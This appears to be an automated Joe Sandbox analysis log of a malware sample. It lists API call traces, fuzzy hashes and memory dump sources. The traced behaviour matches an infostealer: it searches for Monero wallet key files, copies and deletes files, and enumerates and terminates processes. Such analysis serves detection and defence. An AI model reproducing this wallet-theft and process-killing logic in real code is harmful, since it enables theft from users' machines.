                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: 652828f14b0b2602fdff9908e5bc9e23036abc1be29a59a1bdff9e05f101e7d2
                                    • Instruction ID: 0717cf581d8bbd25588a41c3c4cd3c314afc38f9f2ea5521a2397435dbe26db7
                                    • Opcode Fuzzy Hash: 652828f14b0b2602fdff9908e5bc9e23036abc1be29a59a1bdff9e05f101e7d2
                                    • Instruction Fuzzy Hash: C1B13172A002189BCF24FF64DD9AEED7379AF54300F0085A8E50A56191EF30AB49DFD6
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CA523C,?,?,?,00CA52E4,?,?,00000000,?,00000000), ref: 00C81963
                                    • StrCmpCA.SHLWAPI(?,00CA538C), ref: 00C819B3
                                    • StrCmpCA.SHLWAPI(?,00CA5434), ref: 00C819C9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C81D80
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C81E0A
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C81E60
                                    • FindClose.KERNEL32(000000FF), ref: 00C81E72
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: 2df7575ed96990b267c7fcecf2f83a8c3a1618d0ccedbd51ec0b41fa375d5c9f
                                    • Instruction ID: 92eef65282aa22b216d9a8d12dfdc797be306692d13cc1a6eee390afc928b5b9
                                    • Opcode Fuzzy Hash: 2df7575ed96990b267c7fcecf2f83a8c3a1618d0ccedbd51ec0b41fa375d5c9f
                                    • Instruction Fuzzy Hash: AB12DF71914118ABCF15FB60DCAAEEE737DAF54300F4045E9B50A66091EF306B89DFA1
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00CA0C32), ref: 00C8DF5E
                                    • StrCmpCA.SHLWAPI(?,00CA15C0), ref: 00C8DFAE
                                    • StrCmpCA.SHLWAPI(?,00CA15C4), ref: 00C8DFC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C8E4E0
                                    • FindClose.KERNEL32(000000FF), ref: 00C8E4F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: c5590d20341a7405bf9990f7b0c88835a4a1a4fab47498d4129da2959cb6e4c0
                                    • Instruction ID: 7ec1f28d5bc3417573e835b91dea5ba9cfb7128af6f1081a085b8bc7942a96cf
                                    • Opcode Fuzzy Hash: c5590d20341a7405bf9990f7b0c88835a4a1a4fab47498d4129da2959cb6e4c0
                                    • Instruction Fuzzy Hash: 06F1CB719141189BCF19FB60CCAAEEE7339BF54300F4045E9A10A62091EF306F88DFA6
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00CA15A8,00CA0BAF), ref: 00C8DBEB
                                    • StrCmpCA.SHLWAPI(?,00CA15AC), ref: 00C8DC33
                                    • StrCmpCA.SHLWAPI(?,00CA15B0), ref: 00C8DC49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C8DECC
                                    • FindClose.KERNEL32(000000FF), ref: 00C8DEDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 3ac309d22cc12defc8d73d12237b11b98356c9debf8a83ec2d91476f9c26b044
                                    • Instruction ID: f7a1b9ceeb6c0ca555739a022380c431b26e3fcf0c3f815cae04470a00ccd496
                                    • Opcode Fuzzy Hash: 3ac309d22cc12defc8d73d12237b11b98356c9debf8a83ec2d91476f9c26b044
                                    • Instruction Fuzzy Hash: A6911572A002089BCF14FB74ED9A9ED737DAF94344F004668F91B56181EE349B48EBD6
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C99905
                                    • Process32First.KERNEL32(00C89FDE,00000128), ref: 00C99919
                                    • Process32Next.KERNEL32(00C89FDE,00000128), ref: 00C9992E
                                    • StrCmpCA.SHLWAPI(?,00C89FDE), ref: 00C99943
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C9995C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C9997A
                                    • CloseHandle.KERNEL32(00000000), ref: 00C99987
                                    • CloseHandle.KERNEL32(00C89FDE), ref: 00C99993
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: 1b9bb00cbce73dab9783d55f2bf8e1dbe30e405a45a173f2d73c7c4365afff1a
                                    • Instruction ID: 7e3d39a2cc33c4790648dcaf1a4e1d391ffddebe3eca5b2dad531837d120dc0f
                                    • Opcode Fuzzy Hash: 1b9bb00cbce73dab9783d55f2bf8e1dbe30e405a45a173f2d73c7c4365afff1a
                                    • Instruction Fuzzy Hash: 6611EC75A04318ABDB24EFA5EC48BDDB7B9AB49701F0045CCF609A6250DB749B84DF90
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00CA05B7), ref: 00C97D71
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00C97D89
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C97D9D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C97DF2
                                    • LocalFree.KERNEL32(00000000), ref: 00C97EB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 6117bb03a3026459c7b7f31782694b89ee235d1f877448e0b8264e2b2a91b527
                                    • Instruction ID: 7d34b12b0401e7e05a3b99831cd1bd68ec1286567f84ef257f161e7376ccc723
                                    • Opcode Fuzzy Hash: 6117bb03a3026459c7b7f31782694b89ee235d1f877448e0b8264e2b2a91b527
                                    • Instruction Fuzzy Hash: DD414B71955218ABCF24DB94DC9DBEEB778FB44700F2042D9E10A66290DB346F84DFA1
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00CA0D79), ref: 00C8E5A2
                                    • StrCmpCA.SHLWAPI(?,00CA15F0), ref: 00C8E5F2
                                    • StrCmpCA.SHLWAPI(?,00CA15F4), ref: 00C8E608
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C8ECDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 1b6cb693dc352b744b213f8bf930a02a2f7726fe9f292d0e6eac7d4fa0070836
                                    • Instruction ID: 24da108a4d43760a785cda8a51000f5e5b53a55091a1ce3aa8987c15ec285cca
                                    • Opcode Fuzzy Hash: 1b6cb693dc352b744b213f8bf930a02a2f7726fe9f292d0e6eac7d4fa0070836
                                    • Instruction Fuzzy Hash: FB12EC72A141189BCF18FB60DDAAEED7379AF54300F4045E9B50A66091EE306F48EFD6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Aao~$`xo$qa_c$~P~?$69_$Xg
                                    • API String ID: 0-3889916959
                                    • Opcode ID: 35b28ac01d9e237c1bd6289792c2f5d2b815dcff67876018c2109d24d220d6f1
                                    • Instruction ID: 548aacf4c1baee426905b4ece78219b8d0cee137193d3b4205a032ca467ed953
                                    • Opcode Fuzzy Hash: 35b28ac01d9e237c1bd6289792c2f5d2b815dcff67876018c2109d24d220d6f1
                                    • Instruction Fuzzy Hash: 0CB229F3A0C2049FE3046E2DEC8577ABBE5EF94320F1A4A3DE6C4C7744EA7558058696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: '8y$Q1o<$Rv^|$aN.o${g6^$D=?
                                    • API String ID: 0-2212110673
                                    • Opcode ID: 3eb895af45a6249093038e3da6eb1f9050dd4b6b369f3656964beedd99b4698b
                                    • Instruction ID: 5e4538c40aa94ab89af68e709ece501eab236518e95477dff12ac7816ce296d6
                                    • Opcode Fuzzy Hash: 3eb895af45a6249093038e3da6eb1f9050dd4b6b369f3656964beedd99b4698b
                                    • Instruction Fuzzy Hash: 97A2D5F360C204AFE3046E2DEC8567ABBE9EF94720F16493DEAC4C7344E67598148796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: \u$\u${${$}$}
                                    • API String ID: 0-582841131
                                    • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction ID: 56635c3f65bdac1805bdff6e16360ab30376d3e450149e71a5fb7a2fb97bccd3
                                    • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction Fuzzy Hash: 31416B12E19BC9C5CB058B7544A12AEBFB22FD6210F6D42AEC4DD1F382C774464AD3A5
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C8C971
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C8C97C
                                    • lstrcat.KERNEL32(?,00CA0B47), ref: 00C8CA43
                                    • lstrcat.KERNEL32(?,00CA0B4B), ref: 00C8CA57
                                    • lstrcat.KERNEL32(?,00CA0B4E), ref: 00C8CA78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
